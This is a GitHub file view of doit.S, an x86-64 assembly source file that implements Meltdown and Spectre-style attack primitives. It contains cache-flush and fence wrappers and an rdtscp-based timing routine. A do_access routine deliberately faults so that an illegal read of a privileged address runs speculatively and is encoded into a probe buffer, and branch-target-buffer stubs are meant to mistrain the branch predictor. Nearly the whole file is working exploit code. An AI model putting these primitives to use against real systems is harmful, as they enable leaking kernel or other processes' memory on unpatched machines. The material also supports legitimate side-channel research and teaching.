-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathdoit.S
63 lines (49 loc) · 998 Bytes
/
doit.S
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
.global clflush
clflush:
clflush (%rdi)
ret
.global mfence
mfence:
mfence
ret
.global measure_access_time
measure_access_time:
push %rdi
push %rbx
// rbx = cur_tsc
rdtscp
mov %rax, %rbx
// Deref memory at rdi (rdi is ptr param)
mov (%rdi), %rdi
// rax = cur_tsc - rbx
rdtscp
sub %rbx, %rax
pop %rbx
pop %rdi
ret
.global do_access
do_access:
push %rbx
push %rdi
push %rsi
// Cause an exception now. This will make the code below happen only speculatively
movb (0x0), %al
// Do the Meltdown illegal access (rsi is ptr param)
movb (%rsi), %bl
shl $0xc, %rbx
// rdi is our_buffer param
mov (%rdi, %rbx, 1), %rbx
.global after_exception
after_exception:
pop %rsi
pop %rdi
pop %rbx
ret
// The following will be moved to correct virtual addresses to fool the branch predictor
.global btb_call
btb_call:
callq *%rdi
ret
.global btb_gadget
btb_gadget:
ret